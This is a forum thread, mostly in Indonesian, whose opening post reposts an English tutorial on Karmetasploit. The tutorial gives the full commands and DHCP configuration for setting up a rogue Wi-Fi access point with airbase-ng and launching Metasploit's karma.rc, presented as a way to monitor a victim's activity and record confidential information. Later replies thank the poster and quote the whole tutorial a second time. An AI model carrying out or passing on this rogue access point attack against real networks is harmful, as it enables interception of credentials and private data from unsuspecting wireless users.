[SHARE] Karmetasploit
#1
assalamu'alaikum wr wb,,
junior mo coba buat thread omz,,hahah Big Grin
kalo salah kamar mohon maaf n mohon di arah kan yah
cekidot now

Wireless communication is now become a need of networking, radio signals are unseen but they carry your information on the form of bits by using different modulation techniques. However security is very important for wireless network because it is more vulnerable. As discussed before about wireless security and rogue access point, in this article i will try to cover Karmetasploit.

Metasploit is now one of the best tool for penetration testing and the word Karmetasploit has driven from two words one is KARMA (KARMA Attacks Radioed Machines Automatically) and the other is Metasploit.

So what is Karmetasploit?

KARMA is a wireless client attack toolkit and the integration of Karma and metasploit is called Karmetasploit, in 2004 Dino A. Dai Zovi and Shane A. Macaulay did a presentation called "All your layer are belong to us" in that presentation they have described the insecurity of wireless access point and introduced the tool KARMA. This tool acts as wireless access point and responds to all probe requests from wireless clients. Once a client has associated with the KARMA access point, every service they try to access leads to a malicious application.

The above passage gives the basic introduction of KARMA and about Metasploit your can learn from here.

Karmetasploit Tutorial
Configuration


If you are not using backtrack 5 than you must have to install some dependencies like Aircrack-ng

$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ make
# make install
# airmon-ng start [wifi-interface]

For backtrack like backtrack5 follow the procedure

root@bt:/pentest/exploits/framework3# wget http://www.offensive-security.com/downloads/karma.rc

Now here is the need to configure DHCP server so that the Fake AP connect with the network.

root@bt:/pentest/exploits/framework3# cat /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}

root@bt:~# gem install activerecord sqlite3-ruby

By we approx done now the time to restart the wireless interface and start listening.

root@bt:~# airmon-ng
root@bt:~# airmon-ng stop ath0
root@bt:~# airmon-ng start wifi0
root@bt:~# airbase-ng -P -C 30 -e "U R PWND" -v ath1

What this commands do? These command is used to create a new interface that is rogue interface or fake AP, now we have to assign IP address and DHCP configuration so the interface work properly.

root@bt:~# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0root@bt:~# ps aux | grep dhcpd

Karmetasploit Attack Vector
After configuration you are ready to run karmetasploit and start an attack

root@bt:~# cd /pentest/exploits/framework3/
root@bt:/pentest/exploits/framework3# msfconsole -r karma.rc

The command will start metasploit and than Karma script start to act as a fake AP and it will give you the command like this

msf auxiliary(http) >

When the victim will start using this AP you are free to monitor all the activities and you can record of the confidential information.

msf auxiliary(http) >
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.google.com)

This is little advance tutorial and if you dont understand it than it means you have to understand rogue access point first.


source
http://www.ehacking.net/2011/08/karmetas....html#more
semoga berguna
pamiit assalamu'alaikum

#2
thanks for your info Big Grin

#3
This information, is useful Smile
Thankyou, sir!
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#4
Quote:This information, is useful Smile
Thankyou, sir!

Quote:thanks for your info Big Grin
you are welcome,, Smile Big Grin

#5
Manteb Om

Terimakasih Ya!
Please Edit My Post
Sory For No English!
Im Forget
root@nosetrave:~# ./plagiat.sh
English motherfucker, do you speak it ?
root@nosetrave:~#


#6
fungsi ny ap ni om?

#7
itu untuk wiffi attack

#8
(10-10-2011, 12:06 AM)junior.riau18 Wrote: assalamu'alaikum wr wb,,
junior mo coba buat thread omz,,hahah Big Grin
kalo salah kamar mohon maaf n mohon di arah kan yah
cekidot now

Wireless communication is now become a need of networking, radio signals are unseen but they carry your information on the form of bits by using different modulation techniques. However security is very important for wireless network because it is more vulnerable. As discussed before about wireless security and rogue access point, in this article i will try to cover Karmetasploit.

Metasploit is now one of the best tool for penetration testing and the word Karmetasploit has driven from two words one is KARMA (KARMA Attacks Radioed Machines Automatically) and the other is Metasploit.

So what is Karmetasploit?

KARMA is a wireless client attack toolkit and the integration of Karma and metasploit is called Karmetasploit, in 2004 Dino A. Dai Zovi and Shane A. Macaulay did a presentation called "All your layer are belong to us" in that presentation they have described the insecurity of wireless access point and introduced the tool KARMA. This tool acts as wireless access point and responds to all probe requests from wireless clients. Once a client has associated with the KARMA access point, every service they try to access leads to a malicious application.

The above passage gives the basic introduction of KARMA and about Metasploit your can learn from here.

Karmetasploit Tutorial
Configuration


If you are not using backtrack 5 than you must have to install some dependencies like Aircrack-ng

$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ make
# make install
# airmon-ng start [wifi-interface]

For backtrack like backtrack5 follow the procedure

root@bt:/pentest/exploits/framework3# wget http://www.offensive-security.com/downloads/karma.rc

Now here is the need to configure DHCP server so that the Fake AP connect with the network.

root@bt:/pentest/exploits/framework3# cat /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}

root@bt:~# gem install activerecord sqlite3-ruby

By we approx done now the time to restart the wireless interface and start listening.

root@bt:~# airmon-ng
root@bt:~# airmon-ng stop ath0
root@bt:~# airmon-ng start wifi0
root@bt:~# airbase-ng -P -C 30 -e "U R PWND" -v ath1

What this commands do? These command is used to create a new interface that is rogue interface or fake AP, now we have to assign IP address and DHCP configuration so the interface work properly.

root@bt:~# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0root@bt:~# ps aux | grep dhcpd

Karmetasploit Attack Vector
After configuration you are ready to run karmetasploit and start an attack

root@bt:~# cd /pentest/exploits/framework3/
root@bt:/pentest/exploits/framework3# msfconsole -r karma.rc

The command will start metasploit and than Karma script start to act as a fake AP and it will give you the command like this

msf auxiliary(http) >

When the victim will start using this AP you are free to monitor all the activities and you can record of the confidential information.

msf auxiliary(http) >
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.google.com)

This is little advance tutorial and if you dont understand it than it means you have to understand rogue access point first.


source
http://www.ehacking.net/2011/08/karmetas....html#more
semoga berguna
pamiit assalamu'alaikum


Kayanya bahasa inggris ya, bro...bahasa lokal kita ga ada kah...??? JadiAngry

#9
bingung bro

#10
kek mana lagi bro,,original from source use english language,,
we have uancle google, there are translate tools,, :p






Users browsing this thread: 1 Guest(s)